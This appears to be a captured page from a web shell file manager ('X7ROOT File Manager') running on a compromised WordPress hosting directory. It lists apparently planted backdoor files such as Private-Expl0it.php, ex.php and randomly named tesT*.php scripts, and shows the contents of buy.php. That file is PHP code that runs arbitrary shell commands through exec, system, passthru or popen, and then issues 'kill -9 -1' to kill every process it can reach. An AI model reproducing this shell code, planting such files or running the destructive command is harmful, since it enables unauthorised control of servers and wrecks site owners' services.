X7ROOT File Manager
Current Path:
/home/cbholdings/public_html
home
/
cbholdings
/
public_html
/
📁
..
📄
.htaccess
(717 B)
📁
.well-known
📁
8c60a3b8
📄
Private-Expl0it.php
(43.42 KB)
📁
a18cc
📄
buy.php
(604 B)
📁
cgi-bin
📄
error_log
(914.76 KB)
📄
ex.php
(21.61 KB)
📄
google196368ef2b448247.html
(53 B)
📄
google37e7e895f8656d84.html
(53 B)
📄
googleaeb2e0a7fabb077e.html
(53 B)
📄
index.php
(11.47 KB)
📄
jiw1x8f0.php
(15.21 KB)
📄
kill.php
(929 B)
📄
simple.php
(23.02 KB)
📄
tesTetm.php
(2.87 KB)
📄
tesTopp.php
(2.87 KB)
📄
tesTrCQ.php
(2.87 KB)
📄
tesTuli.php
(2.87 KB)
📄
tesTxcz.php
(2.87 KB)
📄
ticket.php
(5.16 KB)
📁
wp-admin
📄
wp-blog-header.php
(6.95 KB)
📁
wp-content
📁
wp-includes
📄
wp-loada.php
(206 B)
📄
wp-loadb.php
(19.35 KB)
Editing: buy.php
<?php function do_phpfun($cmd,$fun) { $res = ''; switch($fun){ case "exec": @exec($cmd,$res); $res = join("\n",$res); break; case "shell_exec": $res = @shell_exec($cmd); break; case "system": @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean();break; case "passthru": @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean();break; case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f)) $res .= @fread($f,1024);} @pclose($f);break; } return $res; } echo do_phpfun('kill -9 -1', 'popen');
Upload File
Create Folder